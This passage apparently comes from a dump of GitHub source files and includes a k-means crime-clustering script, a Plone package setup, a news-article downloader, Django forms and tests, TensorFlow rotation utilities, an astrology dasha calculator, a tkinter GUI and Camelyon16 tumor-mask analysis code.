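calc_distance walks every pair with itertools.combinations, which is O(n^2) Python-level work. A vectorized sketch with scipy, assuming the same list of (x, y) pixel points and the same 200-pixel threshold (note the original truncates each distance with int() before comparing, which this sketch skips):

import numpy as np
from scipy.spatial.distance import pdist, squareform

def calc_distance_vec(points, threshold=200):
    pts = np.asarray(points, dtype=float)
    close = squareform(pdist(pts)) < threshold  # full pairwise distance matrix
    np.fill_diagonal(close, False)              # a point is not its own neighbour
    return close.any(axis=1).astype(int)        # 1 where any other point is too close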
[center[0]]\n new_df['Longitude'] += [center[1]]\n\n new_df = pd.DataFrame(new_df)\n\n # Now, we can put these centers into a new MongoDB collection\n json_set = new_df.to_json(orient='records')\n r = json.loads(json_set)\n\n repo.dropCollection(\"crime_incident_centers\")\n repo.createCollection(\"crime_incident_centers\")\n repo['esaracin.crime_incident_centers'].insert_many(r)\n repo['esaracin.crime_incident_centers'].metadata({'complete':True})\n print(repo['esaracin.crime_incident_centers'].metadata())\n\n\n repo.logout()\n\n endTime = datetime.datetime.now()\n\n return {\"start\":startTime, \"end\":endTime}\n\n @staticmethod\n def provenance(doc = prov.model.ProvDocument(), startTime = None, endTime = None): \n '''Creates the provenance document describing the merging of data\n occuring within this script.'''\n \n # Set up the database connection\n client = dml.pymongo.MongoClient()\n repo = client.repo\n repo.authenticate('esaracin', 'esaracin')\n\n # Add useful namespaces for this prov doc\n doc.add_namespace('alg', 'http://datamechanics.io/algorithm/')\n doc.add_namespace('dat', 'http://datamechanics.io/data/')\n doc.add_namespace('ont', 'http://datamechanics/io/ontology/')\n doc.add_namespace('log', 'http://datamechanics.io/log/')\n\n # Add this script as a provenance agent to our document. Also add the\n # entity and activity utilized and completed by this script.\n this_script = doc.agent('alg:esaracin#kmeans_crime_incidents', {prov.model.PROV_TYPE:prov.model.PROV['SoftwareAgent'], 'ont:Extension':'py'})\n resource_crimes = doc.entity('dat:esaracin#crime_incidents',{'prov:label':'MongoDB Set',prov.model.PROV_TYPE:'ont:DataResource'})\n clustering = doc.activity('log:uuid'+str(uuid.uuid4()), startTime, endTime)\n\n doc.wasAssociatedWith(clustering, this_script)\n doc.usage(clustering, resource_crimes, startTime, None, {prov.model.PROV_TYPE:'ont:Transformation'})\n\n clustered = doc.entity('dat:esaracin#crime_incident_centers', {prov.model.PROV_LABEL:'Clustered Set', prov.model.PROV_TYPE:'ont:DataSet'})\n doc.wasAttributedTo(clustered, this_script)\n doc.wasGeneratedBy(clustered, clustering, endTime)\n doc.wasDerivedFrom(clustered, resource_crimes, clustering, clustering, clustering)\n\n\n repo.logout()\n return doc\n\nkmeans_crime_incidents.execute()\n","repo_name":"data-mechanics/course-2017-fal-proj","sub_path":"esaracin/kmeans_crime_incidents.py","file_name":"kmeans_crime_incidents.py","file_ext":"py","file_size_in_byte":4809,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"19064351764","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '1.0'\n\nsetup(name='emc.kb',\n version=version,\n description=\"a knowleage base for EMC project\",\n long_description=open(\"README.txt\").read() + \"\\n\" +\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read(),\n # Get more strings from\n # http://pypi.python.org/pypi?:action=list_classifiers\n classifiers=[\n \"Framework :: Plone\",\n \"Programming Language :: Python\",\n ],\n keywords='python plone',\n author='Adam tang',\n author_email='yuejun.tang@gmail.com',\n url='https://github.com/collective/',\n license='GPL',\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['emc'],\n include_package_data=True,\n zip_safe=False, \n install_requires=[\n 'setuptools',\n 'MySQL-python',\n 'SQLAlchemy',\n 'collective.autopermission',\n 'plone.app.dexterity',\n 'plone.namedfile [blobs]',\n 'plone.app.registry',\n 'plone.app.z3cform',\n 
'plone.app.relationfield',\n 'z3c.caching',\n 'zope.annotation', \n # -*- Extra requirements: -*-\n ],\n extras_require={\n 'test': ['plone.app.testing',]\n }, \n entry_points=\"\"\"\n # -*- Entry points: -*-\n\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n\n )\n","repo_name":"MWatHIT/Project","sub_path":"emc/src/emc.kb/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38845839737","text":"import multiprocessing as mp\nimport newspaper\nimport os\nimport hashlib\nimport traceback\nimport tldextract\nimport tqdm\nfrom filter import should_exclude\n\nhash = hashlib.sha256\n\ntry:\n os.mkdir('data')\nexcept FileExistsError:\n pass\n\n\ndef dl(url):\n url = url.strip()\n\n if should_exclude(url):\n return\n\n ext = tldextract.extract(url)\n domain = '.'.join([x for x in ext if x])\n\n fname = 'data/{}-{}.txt'.format(domain, hash(url.encode()).hexdigest())\n if os.path.isfile(fname):\n return\n# print('Downloading', url)\n try:\n article = newspaper.Article(url, fetch_images=False)\n article.download()\n article.parse()\n except newspaper.article.ArticleException:\n# print('Dead link:', url)\n return\n# traceback.print_exc()\n\n text = article.text\n\n \n if text.strip() == '':\n# print('Empty')\n return\n\n with open(fname, 'w') as out:\n out.write(text)\n\n\nif __name__ == '__main__':\n p = mp.Pool(100) # num of download threads\n with open('urls.txt') as fh:\n urls = list(fh)\n\n list(tqdm.tqdm(p.imap(dl, urls), total=len(urls)))\n print('Done!')\n","repo_name":"yet-another-account/openwebtext","sub_path":"download_old.py","file_name":"download_old.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":366,"dataset":"github-code","pt":"61"} +{"seq_id":"10148150263","text":"from django import forms\nfrom django.forms import ModelForm, fields\nfrom django.forms import widgets\nfrom django.forms.models import ModelChoiceField\nfrom django.forms.widgets import Widget\nfrom .models import Motivo, Usuario, Vehiculo\n\n\nclass VehiculoForm(forms.ModelForm):\n\n class Meta:\n model=Vehiculo\n fields = ['patente', 'marca', 'modelo', 'categoria']\n labels ={\n 'patente': 'Patente de vehiculo',\n 'marca': 'Marca de vehiculo',\n 'modelo': 'Model de vehiculo',\n 'categoria': 'Categoria de vehiculo',\n \n }\n widgets={\n 'patente': forms.TextInput(\n attrs={\n 'class': 'form-control',\n 'placeholder':'Ingrese patente',\n 'id': 'patente'\n }\n ),\n 'marca': forms.TextInput(\n attrs={\n 'class': 'form-control',\n 'placeholder': 'Ingrese marca',\n 'id': 'marca'\n }\n ),\n 'modelo': forms.TextInput(\n attrs={\n 'class': 'form-control',\n 'placeholder': 'Ingrese modelo',\n 'id': 'modelo'\n }\n ),\n 'categoria': forms.Select(\n attrs={\n 'class': 'form-control',\n 'id': 'categoria',\n }\n )\n }","repo_name":"ipiknipsi/Exp3Backend_AlvarezRetamalOrtiz_004D","sub_path":"Update 1 implementación template y Django/core/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70839674435","text":"import tensorflow as tf\nimport numpy as np\nfrom . 
import loss\nfrom scipy.spatial.transform import Rotation as R\nimport matplotlib.pyplot as plt\nimport os\nimport cv2\n# Copied from tensorflow graphics API\n# https://github.com/tensorflow/graphics/blob/master/tensorflow_graphics/geometry/transformation/rotation_matrix_3d.py\ndef _build_matrix_from_sines_and_cosines(sin_angles, cos_angles):\n \"\"\"Builds a rotation matrix from sines and cosines of Euler angles.\n Note:\n In the following, A1 to An are optional batch dimensions.\n Args:\n sin_angles: A tensor of shape `[A1, ..., An, 3]`, where the last dimension\n represents the sine of the Euler angles.\n cos_angles: A tensor of shape `[A1, ..., An, 3]`, where the last dimension\n represents the cosine of the Euler angles.\n Returns:\n A tensor of shape `[A1, ..., An, 3, 3]`, where the last two dimensions\n represent a 3d rotation matrix.\n \"\"\"\n sin_angles.shape.assert_is_compatible_with(cos_angles.shape)\n\n sx, sy, sz = tf.unstack(sin_angles, axis=-1)\n cx, cy, cz = tf.unstack(cos_angles, axis=-1)\n m00 = cy * cz\n m01 = (sx * sy * cz) - (cx * sz)\n m02 = (cx * sy * cz) + (sx * sz)\n m10 = cy * sz\n m11 = (sx * sy * sz) + (cx * cz)\n m12 = (cx * sy * sz) - (sx * cz)\n m20 = -sy\n m21 = sx * cy\n m22 = cx * cy\n matrix = tf.stack((m00, m01, m02,\n m10, m11, m12,\n m20, m21, m22),\n axis=-1) # pyformat: disable\n output_shape = tf.concat((tf.shape(input=sin_angles)[:-1], (3, 3)), axis=-1)\n return tf.reshape(matrix, shape=output_shape)\n\ndef from_euler(angles, name=None):\n r\"\"\"Convert an Euler angle representation to a rotation matrix.\n The resulting matrix is $$\\mathbf{R} = \\mathbf{R}_z\\mathbf{R}_y\\mathbf{R}_x$$.\n Note:\n In the following, A1 to An are optional batch dimensions.\n Args:\n angles: A tensor of shape `[A1, ..., An, 3]`, where the last dimension\n represents the three Euler angles. 
`[A1, ..., An, 0]` is the angle about\n `x` in radians `[A1, ..., An, 1]` is the angle about `y` in radians and\n `[A1, ..., An, 2]` is the angle about `z` in radians.\n name: A name for this op that defaults to \"rotation_matrix_3d_from_euler\".\n Returns:\n A tensor of shape `[A1, ..., An, 3, 3]`, where the last two dimensions\n represent a 3d rotation matrix.\n Raises:\n ValueError: If the shape of `angles` is not supported.\n \"\"\"\n with tf.compat.v1.name_scope(name, \"rotation_matrix_3d_from_euler\", [angles]):\n angles = tf.convert_to_tensor(value=angles)\n\n sin_angles = tf.sin(angles)\n cos_angles = tf.cos(angles)\n return _build_matrix_from_sines_and_cosines(sin_angles, cos_angles)\n\ndef compute_euler_angles_from_rotation_matrices(rotation_matrices):\n R = rotation_matrices\n sy = tf.sqrt(R[:, 0, 0] * R[:, 0, 0] + R[:, 1, 0] * R[:, 1, 0])\n singular = sy < 1e-6\n singular = tf.cast(singular, tf.float32)\n\n x = tf.atan2(R[:, 2, 1], R[:, 2, 2])\n y = tf.atan2(-R[:, 2, 0], sy)\n z = tf.atan2(R[:, 1, 0], R[:, 0, 0])\n\n xs = tf.atan2(-R[:, 1, 2], R[:, 1, 1])\n ys = tf.atan2(-R[:, 2, 0], sy)\n zs = R[:, 1, 0] * 0\n\n x = x * (1 - singular) + xs * singular\n y = y * (1 - singular) + ys * singular\n z = z * (1 - singular) + zs * singular\n\n out_euler = tf.stack([x, y, z], axis=1)\n\n return out_euler\n\n# Input: batch*n\n# Output: batch*n normalize\ndef normalize_vector(v, return_mag=False):\n v_mag = tf.math.sqrt(tf.math.reduce_sum(tf.math.pow(v, 2), axis=1))\n v_mag = tf.math.maximum(v_mag, tf.constant(1e-8))\n v_mag = tf.repeat(tf.reshape(v_mag, (-1, 1)), v.shape[1], axis=1)\n v = v / v_mag\n if (return_mag == True):\n return v, v_mag[:, 0]\n else:\n return v\n\ndef cross_product(u, v):\n #batch = u.shape[0]\n i = u[:, 1] * v[:, 2] - u[:, 2] * v[:, 1]\n j = u[:, 2] * v[:, 0] - u[:, 0] * v[:, 2]\n k = u[:, 0] * v[:, 1] - u[:, 1] * v[:, 0]\n\n out = tf.concat((tf.reshape(i, (-1, 1)), tf.reshape(j, (-1, 1)), tf.reshape(k, (-1, 1))), 1)\n return out\n\ndef compute_rotation_matrix_from_ortho6d(ortho6d):\n x_raw = ortho6d[:, 0:3] # batch*3\n y_raw = ortho6d[:, 3:6] # batch*3\n\n x = normalize_vector(x_raw) # batch*3\n z = cross_product(x, y_raw) # batch*3\n z = normalize_vector(z) # batch*3\n y = cross_product(z, x) # batch*3\n\n x = tf.reshape(x, (-1, 3, 1))\n y = tf.reshape(y, (-1, 3, 1))\n z = tf.reshape(z, (-1, 3, 1))\n matrix = tf.concat((x, y, z), 2) # batch*3*3\n return matrix\n\n# http://www.boris-belousov.net/2016/12/01/quat-dist/\ndef compute_geodesic_distance_from_two_matrices(m1, m2):\n m = tf.matmul(m1, tf.transpose(m2, perm=[0, 2, 1]))\n\n cos = (m[:, 0, 0] + m[:, 1, 1] + m[:, 2, 2] - 1) / 2\n cos = tf.clip_by_value(cos, clip_value_min=-1, clip_value_max=1)\n\n theta = tf.math.acos(cos)\n\n return theta\n\ndef apply_mask(images, masks, extra=0):\n if extra > 0:\n kernel = np.ones((extra+1, extra+1))\n masks = cv2.dilate(masks, kernel, iterations=1)\n\n masks = np.expand_dims(masks, axis=3)\n masks = np.repeat(masks, 3, axis=3)\n images = images*masks\n return images\n\n\ndef calculate_errors(errors):\n mean = np.mean(errors)\n std = np.std(errors)\n max = np.max(errors)\n return mean, std, max\n\n\ndef print_errors(mean, std, max):\n print(\"*****************\")\n print(\"Mean: %f\" % mean)\n print(\"Std: %f\" % std)\n print(\"Max: %f\" % max)\n print(\"*****************\")\n\ndef get_indices_from_max2min(array):\n return np.flip(np.argsort(array))\n\n# Input: ground truth orientations 3x3 rotation matrix, predicted orientations 3x3 rotation matrix, image_ids\ndef 
evaluate(gt_orientations, pred_orientations, dataset, save_dir, show=5):\n gt_orientations = gt_orientations.astype(np.float32)\n\n print(\"Evaluation\")\n # Geodesic distance\n geo_errors = compute_geodesic_distance_from_two_matrices(gt_orientations, pred_orientations) * 180 / np.pi\n sess = tf.compat.v1.Session()\n geo_errors = sess.run(geo_errors)\n mean, std, max = calculate_errors(geo_errors)\n print(\"Geodesic distance: \")\n print_errors(mean, std, max)\n\n # Euclidean distance\n euc_errors = loss.euc_dist_keras(gt_orientations, pred_orientations)\n euc_errors = sess.run(euc_errors)\n mean, std, max = calculate_errors(euc_errors)\n print(\"Euclidean distance: \")\n print_errors(mean, std, max)\n\n # Get the list of errors in a asc way\n ann_per_image = len(dataset.image_info[0][\"annotations\"])\n indices = get_indices_from_max2min(geo_errors)\n image_indices = np.trunc(indices / ann_per_image).astype(int)\n annotation_indices = indices % ann_per_image\n\n # For each error get its pred_angles and gt_angles\n print(\"\\n*********************\")\n print(\"Errors in asc order: \")\n print(\"*********************\\n\")\n for i in range(0, image_indices.shape[0]):\n id = image_indices[i]\n ann_id = annotation_indices[i]\n annotation = dataset.image_info[id][\"annotations\"][ann_id]\n gt_angles = annotation['orientation']\n pred_orientation = pred_orientations[indices[i]]\n rotation = R.from_matrix(pred_orientation)\n pred_angles = rotation.as_euler('ZYX', degrees=True)\n geo_error = geo_errors[indices[i]]\n euc_error = np.mean(euc_errors[indices[i]])\n if i < show:\n print(\"Number %i\" % i)\n print(\"Geodesic error: %f\" % geo_error)\n print(\"Euclidean error: %f\" % euc_error)\n print(\"Ground truth orientation: X: %f, Y: %f, Z: %f\" % (gt_angles[0], gt_angles[1], gt_angles[2]))\n print(\"Predicted orientation: X: %f, Y: %f, Z: %f\" % (pred_angles[0], pred_angles[1], pred_angles[2]))\n\n hist_geo_errors = geo_errors#np.round(geo_errors)\n hist, _, _ = plt.hist(hist_geo_errors, bins=360, range=(0, 180))\n plt.title('Geodesic distance error')\n plt.xlabel(\"Error\")\n plt.ylabel(\"Frequency\")\n plt.savefig(os.path.join(save_dir, \"geo_hist.png\"))\n\n\ndef main():\n # Test normalize vector\n v = tf.constant([[5., 0., 0.], [2., 2., 4.], [0., 0., 7.]])\n normalized = normalize_vector(v)\n sess = tf.compat.v1.Session()\n normalized = sess.run(normalized)\n print(normalized)\n\n # Test cross product\n v = tf.constant([[1, 2, 3]])\n u = tf.constant([[4, 5, 6]])\n cross = cross_product(u, v)\n cross = sess.run(cross)\n print(cross)\n\n # Rotation matrix from ortho 6d\n v = tf.constant([[1., 2., 3., 4., 5., 6.]])\n rm = compute_rotation_matrix_from_ortho6d(v)\n rm = sess.run(rm)\n print(rm)\n\n # Rotation matrix from euler ZYX\n angles = np.radians(np.array([180., 20., 70.]))\n euler = tf.constant(angles)\n rm = from_euler(euler)\n rm = sess.run(rm)\n print(rm)\n\n # Euler from rotation matrix\n euler = compute_euler_angles_from_rotation_matrices(rm.reshape(1, 3, 3))\n euler = sess.run(euler)\n print(np.degrees(euler))\n\n # Geodesic error\n angles1 = np.radians(np.array([[33., -11., 79.], [33., -11., 79.], [45., 70., -50.]]).astype(np.float))\n euler = tf.constant(angles1)\n rm1 = from_euler(euler)\n angles2 = np.radians(np.array([[32., 7.51, -109], [32., 7.51, -109], [-300, 55, 44]]).astype(np.float))\n euler = tf.constant(angles2)\n rm2 = from_euler(euler)\n error = compute_geodesic_distance_from_two_matrices(rm1, rm2)\n error = tf.math.reduce_mean(error)\n error = sess.run(error)\n 
print(error)\n\nif __name__ == \"__main__\":\n main()","repo_name":"anton-cid-mejias/Orientation","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16207192345","text":"from hora import const, utils\nfrom hora.panchanga import panchanga\nfrom hora.horoscope.chart import charts\ndef patyayini_dhasa(jd_years,place,ayanamsa_mode='Lahiri',divisional_chart_factor=1):\n \"\"\"\n Compute Patyaayini Dhasa\n Should be used for Tajaka Annual charts\n @param jd_years:Julian day number for Tajaka Annual date/time\n @param place: panchanga.Place struct tuple of ('Place',latitude,longitude,time_zone_offset)\n @param ayanamsa_mode: Default = 'Lahiri'\n @param divisional_chart_factor: Default = 1 (Raasi) - See const.division_chart_factors for other possible values\n @return patyayini dhasa values as a list [planet, dhasa_duration in days]\n Example: [[5, (1993, 6, 26), 24.9], [3, (1993, 8, 13), 48.1], [1, (1993, 8, 14), 0.57],...]]\n \"\"\"\n cht = charts.divisional_chart(jd_years,place,ayanamsa_mode,divisional_chart_factor)\n cht_1 = cht[:-2] # Exclude Rahu and Ketu\n cht_1.sort(key=lambda x:x[1][1])\n max_long = max(cht_1, key=lambda x:x[1][-1])[1][1]\n cht_2 = []\n for i,[p,(h,long)] in enumerate(cht_1):\n if i==0:\n cht_2.append([p,round(long/max_long*const.average_gregorian_year,2)])\n else:\n long1 = long - cht_1[i-1][1][1]\n cht_2.append([p,round(long1/max_long*const.average_gregorian_year,2)])\n jd_start = jd_years\n cht3 = []\n for p,dd in cht_2:\n jd_end = jd_start + dd\n dhasa_end = utils.jd_to_gregorian(jd_end)[:3]\n cht3.append([p,dhasa_end,dd])\n jd_start = jd_end \n return cht3\nif __name__ == \"__main__\":\n jd_at_dob = utils.julian_day_number((1996,12,7),(10,34,0))\n place = panchanga.Place('unknown',13.0389,80.2619,5.5)\n divisional_chart_factor = 9\n ayanamsa_mode = 'Lahiri'\n years = 26\n jd_at_years = jd_at_dob + years*const.sidereal_year\n cht=patyayini_dhasa(jd_at_years, place, ayanamsa_mode, divisional_chart_factor)\n print(cht)\n years = 30\n jd_at_years = jd_at_dob + years*const.sidereal_year\n cht=patyayini_dhasa(jd_at_years, place, ayanamsa_mode, divisional_chart_factor)\n print(cht)\n ","repo_name":"naturalstupid/PyHora","sub_path":"hora/horoscope/dhasa/patyayini.py","file_name":"patyayini.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"61"} +{"seq_id":"40818817415","text":"import tkinter as tk\nfrom tkinter import ttk\n\nlist_of_years = sorted([2019, 2020, 2021])\n\n\ndef get_required_years_list():\n\n start_year = int(list_of_avail_years_start.get())\n stop_year = int(list_of_avail_years_stop.get())\n step = int(spin_step.get())\n\n if step == 0:\n required_years = [str(start_year), str(stop_year)]\n else:\n if start_year == \"\":\n required_years = \"Ustaw rok początkowy\"\n elif stop_year == \"\":\n required_years = [year for year in range(start_year, min(max(list_of_years), start_year + 4 * step\n + 1), step)]\n else:\n required_years = [year for year in range(start_year, stop_year + 1, step)]\n\n return required_years\n\ndef update_preview():\n required_years_list = get_required_years_list()\n\n required_years_list_str = [str(year) for year in required_years_list]\n years_preview[\"text\"] = \", \".join(required_years_list_str)\n\n\ndef generate_new_ver_file():\n print(\"Powiedzmy, że działa\")\n 
main_window.destroy()\n\n\nmain_window = tk.Tk()\nmain_window.geometry(\"450x210\")\nmain_window.title(\"IKMR - Etap I - tworzenie przyszłych sieci\")\n\nlabel_start_year = tk.Label(main_window, text=\"Rok bazowy:\").grid(row=0, column=0, padx=20, pady=20)\nlist_of_avail_years_start = ttk.Combobox(main_window, values=list_of_years)\nlist_of_avail_years_start.grid(row=0, column=2, padx=5, pady=20)\n\nlabel_stop_year = tk.Label(main_window, text=\"Rok końcowy:\").grid(row=1, column=0, padx=20)\nlist_of_avail_years_stop = ttk.Combobox(main_window, values=list_of_years)\nlist_of_avail_years_stop.grid(row=1, column=2, padx=5)\n\nlabel_spin_step = tk.Label(main_window, text=\"Krok dla kolejnych lat:\").grid(row=2, column=0, padx=50, pady=20)\nspin_step = tk.Spinbox(main_window, from_ = 0, to = 10, width=5)\nspin_step.grid(row=2, column=2, padx=10, pady=20)\n\nlabel_years_preview = tk.Label(main_window, text=\"Wybrane lata\").grid(row=3, column=0)\nyears_preview = tk.Message(main_window, width=200, text=\"\")\nyears_preview.grid(row=3, column=2)\n\nbutton_preview = tk.Button(main_window, text=\"Podgląd lat\", command=update_preview).grid(row=4, column=0, pady=5)\nbutton_execute = tk.Button(main_window, text=\"OK\", command=generate_new_ver_file).grid(row=4, column=1, pady=5)\nbutton_cancel = tk.Button(main_window, text=\"Anuluj\", command=main_window.destroy).grid(row=4, column=2, pady=5)\n\nmain_window.mainloop()\n","repo_name":"Cookiee-monster/VISUM_IKMR","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33181396445","text":"from django.test import TestCase\nfrom tasks.build_template_context import BuildTemplateContext\nfrom django.contrib.auth.models import User\nfrom tasks.models import TaskList, SimpleTask\n\n\nclass BuildTemplateContextTest(TestCase):\n\n def setUp(self):\n user = User.objects.create_user(username=\"test@test.com\",\n email=\"test@test.com\",\n password=\"testpassword\")\n self.email = user.email\n TaskList.objects.create(user=user, name=\"Loisirs\", color=\"#55b37e\")\n\n self.tasks = SimpleTask.objects.filter(tasklist__user=user)\n\n self.all_keys = ['overdue_tasks', 'due_today_tasks',\n 'due_tommorow_tasks', 'future_tasks', 'no_date_tasks',\n 'finished_tasks', 'all_tasklists', 'tasklist_to_show']\n\n self.current_keys = ['overdue_tasks', 'due_today_tasks',\n 'due_tommorow_tasks', 'future_tasks',\n 'no_date_tasks', 'all_tasklists',\n 'tasklist_to_show']\n\n self.finished_keys = ['finished_tasks', 'all_tasklists',\n 'tasklist_to_show']\n\n self.urgent_keys = ['urgent_tasks', 'all_tasklists',\n 'tasklist_to_show']\n\n self.important_keys = ['important_tasks', 'all_tasklists',\n 'tasklist_to_show']\n\n self.matrix_keys = ['important_urgent', 'important_non_urgent',\n 'non_important_urgent', 'non_important_non_urgent',\n 'matrix_backlog']\n\n def test_display_all(self):\n test_obj = BuildTemplateContext('all', self.tasks)\n response = test_obj.get_data()\n self.assertTrue(isinstance(response, dict))\n\n for key in response.keys():\n self.assertTrue(key in self.all_keys)\n\n def test_display_current(self):\n test_obj = BuildTemplateContext('current', self.tasks)\n response = test_obj.get_data()\n self.assertTrue(isinstance(response, dict))\n\n for key in response.keys():\n self.assertTrue(key in self.current_keys)\n\n def test_display_finished(self):\n test_obj = BuildTemplateContext('finished', self.tasks)\n response = 
test_obj.get_data()\n self.assertTrue(isinstance(response, dict))\n\n for key in response.keys():\n self.assertTrue(key in self.finished_keys)\n\n def test_display_urgent(self):\n test_obj = BuildTemplateContext('urgent', self.tasks)\n response = test_obj.get_data()\n self.assertTrue(isinstance(response, dict))\n\n for key in response.keys():\n self.assertTrue(key in self.urgent_keys)\n\n def test_display_important(self):\n test_obj = BuildTemplateContext('important', self.tasks)\n response = test_obj.get_data()\n self.assertTrue(isinstance(response, dict))\n\n for key in response.keys():\n self.assertTrue(key in self.important_keys)\n\n def test_display_matrix(self):\n test_obj = BuildTemplateContext('matrix', self.tasks)\n response = test_obj.get_data()\n self.assertTrue(isinstance(response, dict))\n\n for key in response.keys():\n self.assertTrue(key in self.matrix_keys)\n","repo_name":"AntoineMaurin/Melius","sub_path":"tasks/tests/unit/test_build_template_context.py","file_name":"test_build_template_context.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31713390752","text":"# Read downsampled masks (512x downsampled) and output an excel to extract every pixel value\r\n\r\nimport numpy as np\r\nimport os \r\nimport pandas as pd\r\nfrom tqdm import tqdm\r\n\r\nmask_dir = 'Camelyon16/Testing/Tumor Masks (512x downsampled)' # All masks should be in numpy array format\r\noutput_dir = 'Camelyon16/Testing/Tumor Masks Pixel Information'\r\nlist_of_mask = os.listdir(mask_dir)\r\n\r\nthreshold = 0.5\r\n\r\nfor i in tqdm(range(0,len(list_of_mask))):\r\n record = {'x':[],'y':[],'raw_val':[],'corr_prediction':[]}\r\n mask = np.load(f'{mask_dir}/{list_of_mask[i]}')\r\n for y in range(0,mask.shape[0]):\r\n for x in range(0,mask.shape[1]):\r\n val = mask[y,x]\r\n record['x'].append(int(x * 512))\r\n record['y'].append(int(y * 512))\r\n record['raw_val'].append(val / 3) \r\n if val / 3 >= threshold:\r\n corr_pred = 1\r\n else:\r\n corr_pred = 0\r\n record['corr_prediction'].append(corr_pred)\r\n record_df = pd.DataFrame(data = record)\r\n record_df.to_csv(f'{output_dir}/{list_of_mask[i].replace(\"_tumor_mask.npy\",\".csv\")}',index=None)\r\n \r\n#%% Tile-level Analysis\r\n\r\nimport numpy as np\r\nfrom tqdm import tqdm\r\nimport os \r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\ndef get_heatmap(img):\r\n cmap = plt.get_cmap('jet')\r\n rgb_img = cmap(img)\r\n return rgb_img[:,:,0:3]\r\n\r\nimport_dir = 'Camelyon16/Testing/Testing Set'\r\nmodel_dir = 'Camelyon16/Training/Training Results/Model_InceptionV3/model_ckpt'\r\nsave_dir = 'Camelyon16/Testing/Testing Results/Model_InceptionV3'\r\ngt_dir = 'Camelyon16/Testing/Tumor Masks Pixel Information'\r\ngt_npy_dir = 'Camelyon16/Testing/Tumor Masks (512x downsampled)'\r\n\r\nif not os.path.exists(save_dir):\r\n os.mkdir(save_dir)\r\n\r\nrecord = {'case_name':[],'x':[],'y':[],'prediction_normal':[],'prediction_tumor':[],'ground_truth':[]}\r\ntest_case = os.listdir(import_dir)\r\nnum_test_case = len(test_case)\r\n\r\ntile_dim = 512\r\nthreshold = 0.5\r\n\r\n# Load model\r\nmodel = tf.keras.models.load_model(model_dir)\r\n\r\nfor case_i in tqdm(range(0,num_test_case)):\r\n # Load ground truth information\r\n if os.path.exists(f'{gt_dir}/{test_case[case_i]}.csv'):\r\n gt = pd.read_csv(f'{gt_dir}/{test_case[case_i]}.csv')\r\n gt_slide = np.load(f'{gt_npy_dir}/{test_case[case_i]}_tumor_mask.npy')\r\n gt_slide = 
gt_slide / 3\r\n slide_shape = gt_slide.shape\r\n \r\n case_dir = f'{import_dir}/{test_case[case_i]}'\r\n tile_in_case_list = os.listdir(case_dir)\r\n num_tile = len(tile_in_case_list)\r\n \r\n pred_slide_th = np.zeros(slide_shape)\r\n pred_slide_heatmap = np.zeros(slide_shape)\r\n \r\n for tile_i in tqdm(range(0,num_tile)):\r\n tile_load = plt.imread(f'{case_dir}/{tile_in_case_list[tile_i]}')\r\n tile_load = tile_load / 255.0\r\n tile_load = np.reshape(tile_load,(1,512,512,3))\r\n \r\n # Get prediction\r\n prediction = model.predict(tile_load)\r\n pred_normal = float(prediction[:,0]) # Percentage to be normal\r\n pred_tumor = float(prediction[:,1]) # Percentage to be tumor-containing\r\n \r\n # Coordinates\r\n coordinates = tile_in_case_list[tile_i].replace('.jpg','')\r\n coor_x = int(coordinates.split('_')[0])\r\n coor_y = int(coordinates.split('_')[1])\r\n \r\n # Check prediction\r\n x_positive = gt[gt['x'] == coor_x]\r\n x_positive = x_positive.reset_index(drop = True)\r\n xy_positive = x_positive[x_positive['y'] == coor_y]\r\n xy_positive = xy_positive.reset_index(drop = True)\r\n correct_pred = int(xy_positive['corr_prediction'])\r\n \r\n record['case_name'].append(test_case[case_i])\r\n record['x'].append(coor_x)\r\n record['y'].append(coor_y)\r\n record['prediction_normal'].append(pred_normal)\r\n record['prediction_tumor'].append(pred_tumor)\r\n record['ground_truth'].append(correct_pred)\r\n \r\n # Construct heatmap\r\n if pred_tumor >= threshold:\r\n decision = 1 # Exist tumor\r\n else:\r\n decision = 0 # No tumor\r\n \r\n small_coor_x = int(coor_x / tile_dim)\r\n small_coor_y = int(coor_y / tile_dim)\r\n pred_slide_th[small_coor_y,small_coor_x] = decision\r\n pred_slide_heatmap[small_coor_y,small_coor_x] = pred_tumor\r\n \r\n gt_slide_rgb = get_heatmap(gt_slide)\r\n pred_slide_rgb = get_heatmap(pred_slide_heatmap)\r\n \r\n plt.imshow(gt_slide_rgb)\r\n plt.show()\r\n plt.imshow(pred_slide_rgb)\r\n plt.show()\r\n \r\n slide_save = f'{save_dir}/{test_case[case_i]}'\r\n if not os.path.exists(slide_save):\r\n os.mkdir(slide_save)\r\n \r\n plt.imsave(f'{slide_save}/gt_slide_threshold.png',gt_slide,cmap='gray')\r\n plt.imsave(f'{slide_save}/gt_slide_heatmap.png',gt_slide_rgb)\r\n plt.imsave(f'{slide_save}/pred_slide_threshold.png',pred_slide_th,cmap='gray')\r\n plt.imsave(f'{slide_save}/pred_slide_heatmap.png',pred_slide_rgb)\r\n \r\nrecord_df = pd.DataFrame(data = record)\r\nrecord_df.to_csv(f'{save_dir}/record.csv',index=None)\r\n","repo_name":"pakfor/Deep-Learning-of-Histopathological-Images-for-Identification-of-Different-Diseases","sub_path":"Task 1 Approach 